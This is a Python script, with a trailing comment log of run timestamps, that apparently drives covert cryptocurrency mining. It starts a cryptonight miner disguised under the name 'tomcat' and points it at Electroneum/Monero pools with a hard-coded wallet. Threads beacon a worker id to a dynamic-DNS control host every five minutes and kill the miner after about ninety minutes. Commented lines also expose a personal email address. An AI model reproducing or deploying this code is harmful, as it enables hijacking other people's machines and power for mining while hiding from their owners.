import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:07.061931
#2018-02-17 17:14:06.065051
#2018-02-17 19:02:06.264747
#2018-02-17 20:50:08.932173
#2018-02-17 22:37:05.949027
#2018-02-18 00:21:06.756720
#2018-02-18 02:12:03.857547
#2018-02-18 03:59:06.144518
#2018-02-18 05:47:06.627106
#2018-02-18 07:39:05.405544
#2018-02-18 09:26:07.755561
#2018-02-18 11:12:01.562287
#2018-02-18 12:58:06.828982
#2018-02-18 14:47:04.877119
#2018-02-18 16:36:05.018710
#2018-02-18 18:25:05.968176
#2018-02-18 20:12:01.728361
#2018-02-18 21:58:01.683967
#2018-02-18 23:47:01.467797
#2018-02-19 01:32:07.332778
#2018-02-19 03:20:08.639799
#2018-02-19 05:05:08.702048
#2018-02-19 06:51:01.648430
#2018-02-19 08:40:05.105185
#2018-02-19 10:29:07.261930
#2018-02-19 12:17:06.195132
#2018-02-19 14:03:06.485059
#2018-02-19 15:51:05.260679
#2018-02-19 17:38:06.625695
#2018-02-19 19:25:05.077368
#2018-02-19 21:12:06.718614
#2018-02-19 22:58:05.923167
#2018-02-20 00:43:06.106492
#2018-02-20 02:33:07.955833
#2018-02-20 04:22:05.406199
#2018-02-20 06:05:07.862708
#2018-02-20 07:50:07.341365
#2018-02-20 09:35:08.930894
#2018-02-20 11:19:01.244127
#2018-02-20 13:05:10.254588
#2018-02-20 14:50:02.146358
#2018-02-20 16:36:09.111016
#2018-02-20 18:23:01.649995
#2018-02-20 20:13:01.368782
#2018-02-20 21:59:05.443317
#2018-02-20 23:40:08.732836
#2018-02-21 01:25:05.432277
#2018-02-21 03:14:01.951015
#2018-02-21 05:02:04.314538
#2018-02-21 06:49:07.319281
#2018-02-21 08:35:03.936836
#2018-02-21 10:20:05.571715
#2018-02-21 12:07:06.697642
#2018-02-21 13:54:07.204573
#2018-02-21 15:40:01.326098
#2018-02-21 17:31:05.640370
#2018-02-21 19:17:22.337671
#2018-02-21 21:05:07.092222
#2018-02-21 22:52:06.120978
#2018-02-22 00:39:09.016252
#2018-02-22 02:27:03.481830
#2018-02-22 04:14:04.723061
#2018-02-22 05:58:04.961260
#2018-02-22 07:44:06.096479
#2018-02-22 09:32:08.626998
#2018-02-22 11:18:08.571244
#2018-02-22 13:04:06.401408
#2018-02-22 14:53:08.201599
#2018-02-22 16:40:08.842073
#2018-02-22 18:26:01.359967
#2018-02-22 20:19:06.113403
#2018-02-22 22:06:01.978410
#2018-02-22 23:52:06.230802
#2018-02-23 01:41:01.594950
#2018-02-23 03:27:06.081087
#2018-02-23 05:12:02.227336
#2018-02-23 06:56:02.071058
#2018-02-23 08:45:01.546555
#2018-02-23 11:01:01.573752
#2018-02-23 12:56:08.162245
#2018-02-23 14:42:04.738062
#2018-02-23 16:30:10.533586
#2018-02-23 18:18:02.074156
#2018-02-23 20:02:05.862389
#2018-02-23 21:46:05.009667
#2018-02-23 23:38:04.874740
#2018-02-24 01:28:05.935366
#2018-02-24 03:20:01.834280
#2018-02-24 05:05:06.444006
#2018-02-24 06:53:02.118314
#2018-02-24 08:43:05.717869
#2018-02-24 10:27:03.825408
#2018-02-24 12:22:01.465403
#2018-02-24 14:14:05.421050
#2018-02-24 16:01:05.281111
#2018-02-24 17:55:07.520102
#2018-02-24 19:42:08.729695
#2018-02-24 21:28:06.549952
#2018-02-25 01:52:01.937923
#2018-02-25 04:56:04.977615
#2018-02-25 09:23:01.963394